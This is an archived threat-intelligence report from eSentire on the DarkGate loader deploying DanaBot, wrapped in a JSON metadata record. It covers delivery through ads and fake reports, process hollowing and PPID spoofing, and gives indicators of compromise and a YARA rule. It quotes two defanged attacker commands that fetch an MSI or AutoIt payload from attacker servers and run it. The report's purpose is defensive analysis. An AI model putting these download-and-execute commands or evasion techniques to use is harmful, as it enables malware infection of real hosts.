{
	"id": "ed7ee245-378c-4732-a366-b0b95cc77217",
	"created_at": "2026-04-06T01:30:36.04376Z",
	"updated_at": "2026-04-10T13:12:20.391915Z",
	"deleted_at": null,
	"sha1_hash": "3249b4b93f13c161faf840479d429fd730b09512",
	"title": "From DarkGate to DanaBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7423323,
	"plain_text": "From DarkGate to DanaBot\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-06 00:51:21 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nSince August 2023, the eSentire Threat Response Unit (TRU) has observed two cases of DarkGate infection\r\ntargeting the Finance and Manufacturing industries. The stealer was delivered via drive-by downloads disguised as\r\nfake installers, such as an Advanced IP scanner, as well as fake document reports.\r\nDarkGate, a loader written in Borland Delphi, was first announced for sale on a Russian-speaking hacking forum\r\nin early June 2023. The loader developer claimed to have been working on the project since 2017. DarkGate has\r\nan extensive list of features, including hVNC, hAnyDesk, credential stealing, crypto mining, rootkit, reverse\r\nproxy, keylogger, remote desktop, etc. The loader is priced at $1,000 for a one-day use and $15,000 for monthly\r\nusage.\r\nFor the initial access, the loader delivers in a format of LNK, VBS, and MSI, which leads to the execution of the\r\nAutoIt script.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 1 of 15\n\nFigure 1: Loader advertisement on exploit[.]in\r\nThe developer of DarkGate has announced a CrackMe challenge on the forum, offering a reward of $30,000 to\r\nanyone who can bypass the licensing system of the loader's builder/panel.\r\nFigure 2: CrackMe challenge announcement\r\nThe DarkGate loader has grown significantly in popularity, with the developer stating it reached 30 users per\r\nmonth. However, the developer is no longer issuing licenses to new users.\r\nFigure 3: Announcement to stop providing new licenses\r\nRastaFarEye, the mastermind behind DarkGate, is reputed to be a seasoned malware developer, according to users\r\non hacking forums. He is also believed to be the creator of the stealer identified by Kaspersky as\r\n“GreetingGhoul”.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 2 of 15\n\nFigure 4: GreetingGhoul sale announcement on a hacking forum\r\nDelivery and Technical Analysis\r\nThe initial access occurred via a drive-by download. The user was searching for unclaimed money and navigated\r\nto the malicious site via Google Ads and downloaded an automatically generated fake report as a ZIP archive that\r\ncontained the malicious VBS script.\r\nFigure 5: Infection chain within the managed EDR (CrowdStrike)\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 3 of 15\n\nFigure 6: Malicious website serving the payload\r\nWe found three additional websites potentially serving the payloads:\r\nfreelookup[.]org\r\ntreasurydept[.]org\r\ncapitalfinders[.]org\r\nInterestingly enough, Danabot used the same payload delivery technique reported by a Threat Researcher at\r\nProofpoint.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 4 of 15\n\nFigure 7: Twitter thread on the same delivery technique used by DanaBot\r\nThe VBS script leads to the execution of the following command:\r\n\"/c cd /d C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy c:\\windows\\system32\\curl[.]exe\r\nHnVMJmSBX[.]exe \u0026 HnVMJmSBX[.]exe -o aDRQdO[.]msi hxxps[://]plano[.]soulcarelife[.]org/?\r\n5nzumurxizhrb3bpztdybha98e8 \u0026 C:\\Windows\\System32\\msiexec[.]exe /i aDRQdO[.]msi /qn\"\r\nThe script retrieves the MSI installer from one of the attacker-controlled servers. \r\nFigure 8: Malicious VBS script delivering DarkGate MSI installer\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 5 of 15\n\nThe execution of MSI installer eventually leads to the following command execution:\r\n\"C:\\Windows\\System32\\cmd[.]exe\" /c mkdir c:\\bclr \u0026 cd /d c:\\bclr \u0026 copy c:\\windows\\system32\\curl.exe\r\nbclr.exe \u0026 bclr -H \"User-Agent: curl\" -o Autoit3.exe hxxp[://]whatup[.]cloud:9999 \u0026 bclr -o kdvyeg.au3\r\nhxxp[://]whatup[.]cloud:9999/msibclrlapx \u0026 Autoit3.exe kdvyeg.au3\r\nThe command creates the bclr directory under C:\\, copies curl.exe from C:\\Windows\\system32 and renames it as\r\nbclr.exe to bclr directory, and downloads kdvyeg.au3 (MD5: 296c88dda6b9864da68f0918a6a7280d) (DarkGate\r\nAutoIT script) and Autoit3.exe files.\r\nThreat Analyst @0xToxin already performed a great analysis of the AutoIt script that can be accessed here.\r\nUpon initial infection, DarkGate achieves persistence on the host via the Startup folder to run the malicious AutoIt\r\nscript dropped under the ProgramData folder as shown below. The shortcut file is removed by the injected process\r\nand recreated periodically, which makes it hard for an analyst to identify the persistence mechanism.\r\nFigure 9: Contents of the shortcut file\r\nIn the case we were investigating, the loader opens the decoy PDF file shown below.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 6 of 15\n\nFigure 10: Decoy PDF file\r\nCompared to the previous version of DarkGate where the final DarkGate payload would be decrypted via an XOR\r\nroutine, the latest DarkGate version utilizes a custom base64-encoding algorithm, as shown below.\r\nFigure 11: Custom base64-decoding function\r\nIn the previous version, when decrypting the final payload, it contained a configuration with a custom base64-\r\nencoded string. In the newer version, the configuration and the C2 domains are separated into two distinct parts.\r\nThe configuration part is ZLIB-compressed and custom base64-encoded.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 7 of 15\n\nFigure 12: Extracted configuration\r\nAs mentioned above, DarkGate has the hVNC capability. From the snippet shown below, the hVNC is broken into\r\ndifferent phases including Cleaning Virtual Desk Processes Phase involving thread termination, Browser Handling\r\nPhase (possibly handling certain browser attributes or configurations), and Optimization Phase where certain\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 8 of 15\n\nbrowser settings are disabled for a better performance such as disabling audio, sandboxing feature, disabling GPU\r\nhardware acceleration etc.\r\nFigure 13: hVNC functionality\r\nDarkGate performs process hollowing for the core and additional payloads into one of the processes:\r\nGoogleUpdate.exe\r\nTabTip32.exe\r\nBraveUpdate.exe\r\nMicrosoftEdgeUpdate.exe\r\nielowutil.exe\r\nIf process hollowing fails for the above processes, DarkGate proceeds with injecting into cmd.exe which\r\nsubsequently spawns notepad.exe. We have observed DarkGate injecting DanaBot into notepad.exe. Additionally,\r\nthe UAC bypass module was also used for injection. Upon terminating the injected process, DarkGate implements\r\nPPID spoofing (Parent Process ID Spoofing).\r\nPPID spoofing involves manipulating the parent process ID attribute of a newly created process. This is done to\r\ndeceive security solutions into believing the new process was created by a legitimate parent process.\r\nIn case there is an attempt to terminate this malicious process, it has the capability to reinitialize itself under\r\nanother spoofed parent process, continuing its malicious activities while staying under the radar.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 9 of 15\n\nFigure 14: The function responsible for PPID spoofing\r\nIn the code snippet provided, the DarkGate malware attempts to open the desired process and spoof it, repeating\r\nthe attempt up to 12 times until successful. This process involves initializing and updating a thread attribute list. If\r\nsuccessful, the execution flow progresses to a function where it allocates memory within the targeted process,\r\nwrites malicious code into that memory space, and initiates a new thread within the target process to execute the\r\ninjected code.\r\nIf the spoofing attempts fail after 12 tries, it exits with an error, specifically indicating an\r\n“InjectCustomShellcodeWithParamsAndSpoff failure”.\r\nWe can confirm whether the loader is using the PPID spoofing technique by running the Despoof tool that detects\r\nprocess spoofing written by our Principal Security Researcher, Jacob Gajek.\r\nFigure 15: Running Despoof tool to detect PPID spoofing\r\nDarkGate has the ability to manipulate browser data, delete shadow copies (provided the user has administrative\r\nrights), and initiate a shutdown of the infected host.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 10 of 15\n\nFigure 16: Additional DarkGate functionalities including system shutdown and browser folder\r\nmanipulations\r\nIt’s also worth mentioning that compared to previous versions of DarkGate, where the strings were encoded with\r\ncustom base64-encoded strings, with the new version the byte arrays are used as inputs instead to break the\r\nexisting scripts to decode the custom base64-encoded strings.\r\nFigure 17: Encoded strings passed as byte arrays\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts isolated the affected host to contain the infection.\r\nProvided remediation recommendations and support to the customer.\r\nWhat can you learn from this TRU Positive?\r\nThe DarkGate loader is rapidly becoming favored amongst threat actors owing to its stealth features and\r\nextensive array of capabilities.\r\nThe loader is using PPID spoofing to evade detections.\r\nIn the infection chain we observed, DanaBot appears to be deployed by the DarkGate loader.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 11 of 15\n\nRecommendations from our Threat Response Unit (TRU) Team:\r\nProtecting against information stealers requires a multi-layered defense approach to defend endpoints from\r\nmalware and detect or block unauthorized login activity against applications and remote access services.\r\nTherefore, we recommend:\r\nProtecting endpoints against malware.\r\nEnsure antivirus signatures are up to date.\r\nUse a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) product to detect and contain\r\nthreats.\r\nIf an information stealing malware is identified, reset the user’s credentials, and terminate logon sessions\r\nimmediately.\r\nEncouraging good cybersecurity hygiene among your users by using Phishing and Security Awareness\r\nTraining (PSAT) when downloading software from the Internet.\r\nRestricting access to enterprise applications from personal devices outside the scope of security\r\nmonitoring.\r\nEnsuring adequate logging is in place for remote access services such as VPNs and using modern\r\nauthentication methods, which support MFA and conditional access.\r\nPrevent web browsers from automatically saving and storing passwords.\r\nUse of reputable password managers is recommended instead.\r\nIndicators of Compromise\r\nName Indicators\r\nWebsite serving DarkGate payload assetfinder[.]org\r\nkdvyeg.au3 296c88dda6b9864da68f0918a6a7280d\r\nDecrypted DarkGate payload 786486d57e52d2c59f99f841989bfc9d\r\nDarkGate C2 whatup[.]cloud\r\nDarkGate C2 dreamteamup[.]shop\r\nDanaBot 137215315ebf1a920f6ca96be486e358\r\nDanaBot C2 34.106.84.60:443\r\nDanaBot C2 35.241.250.23:443\r\nDanaBot C2 35.198.55.140:443\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 12 of 15\n\nDanaBot C2 34.79.119.253:443\r\nDanaBot embedded hash 32283E415C433DE356C9557DF0309441\r\nIrsForm1340.pdf (decoy file) d8b39e8d78386294e139286f27568dd6\r\nYara\r\nrule DarkGate {\r\n meta:\r\n author = \"RussianPanda\"\r\n description = \"Detects DarkGate\"\r\n date = \"9/17/2023\"\r\n strings:\r\n $s1 = \"hanydesk\"\r\n $s2 = \"darkgate.com\"\r\n $s3 = \"zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=\"\r\n $s4 = {80 e3 30 81 e3 ff 00 00 00 c1 eb 04}\r\n $s5 = {80 e3 3c 81 e3 ff 00 00 00 c1 eb 02}\r\n $s6 = {80 e1 03 c1 e1 06}\r\n condition:\r\n all of ($s*)\r\n and uint16(0) == 0x5A4D\r\n }\r\nReference\r\nhttps://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/\r\nhttps://twitter.com/ffforward/status/1461417886526984195?s=20\r\nhttps://0xtoxin.github.io/threat breakdown/DarkGate-Camapign-Analysis/\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 13 of 15\n\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 14 of 15\n\nSource: https://www.esentire.com/blog/from-darkgate-to-danabot\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 15 of 15\n\n https://www.esentire.com/blog/from-darkgate-to-danabot    \nFigure 12: Extracted configuration    \nAs mentioned above, DarkGate has the hVNC capability. From the snippet shown below, the hVNC is broken into\ndifferent phases including Cleaning Virtual Desk Processes Phase involving thread termination, Browser Handling\nPhase (possibly handling certain browser attributes or configurations), and Optimization Phase where certain\n  Page 8 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/from-darkgate-to-danabot"
	],
	"report_names": [
		"from-darkgate-to-danabot"
	],
	"threat_actors": [],
	"ts_created_at": 1775439036,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3249b4b93f13c161faf840479d429fd730b09512.pdf",
		"text": "https://archive.orkl.eu/3249b4b93f13c161faf840479d429fd730b09512.txt",
		"img": "https://archive.orkl.eu/3249b4b93f13c161faf840479d429fd730b09512.jpg"
	}
}